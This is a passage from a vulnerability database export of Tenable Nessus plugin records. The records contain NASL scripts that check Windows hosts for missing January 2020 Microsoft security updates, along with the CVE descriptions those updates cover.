script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-01';\nkbs = make_list(\n '4532935',\n '4535101',\n '4535103',\n '4535102',\n '4535105',\n '4535104',\n '4532933',\n '4534271',\n '4532938',\n '4534306',\n '4534977',\n '4534976',\n '4532936',\n '4534276',\n '4534293',\n '4534979',\n '4534978'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'01_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:16", "description": "The remote Windows host is missing security update 4534312\nor cumulative update 4534303. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)", "edition": 8, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534312: Windows Server 2008 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0615", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0635", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534303.NASL", "href": "https://www.tenable.com/plugins/nessus/132864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132864);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0608\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534312\");\n script_xref(name:\"MSKB\", value:\"4534303\");\n script_xref(name:\"MSFT\", value:\"MS20-4534312\");\n script_xref(name:\"MSFT\", value:\"MS20-4534303\");\n\n script_name(english:\"KB4534312: Windows Server 2008 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534312\nor cumulative update 4534303. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\");\n # https://support.microsoft.com/en-us/help/4534312/windows-server-2008-update-kb4534312\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8064e787\");\n # https://support.microsoft.com/en-us/help/4534303/windows-server-2008-update-kb4534303\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d835d75\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534312 or Cumulative Update KB4534303.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534303', '4534312');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534303, 4534312])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:49", "description": "The remote Windows host is missing security update 4534314\nor cumulative update 4534310. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534310.NASL", "href": "https://www.tenable.com/plugins/nessus/132866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132866);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534310\");\n script_xref(name:\"MSKB\", value:\"4534314\");\n script_xref(name:\"MSFT\", value:\"MS20-4534310\");\n script_xref(name:\"MSFT\", value:\"MS20-4534314\");\n\n script_name(english:\"KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534314\nor cumulative update 4534310. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\");\n # https://support.microsoft.com/en-us/help/4534310/windows-7-update-kb4534310\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5bc50ca4\");\n # https://support.microsoft.com/en-us/help/4534314/windows-7-update-kb4534314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d29d5dd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534314 or Cumulative Update KB4534310.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534310', '4534314');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534310, 4534314])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:48", "description": "The remote Windows host is missing security update 4534288\nor cumulative update 4534283. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication 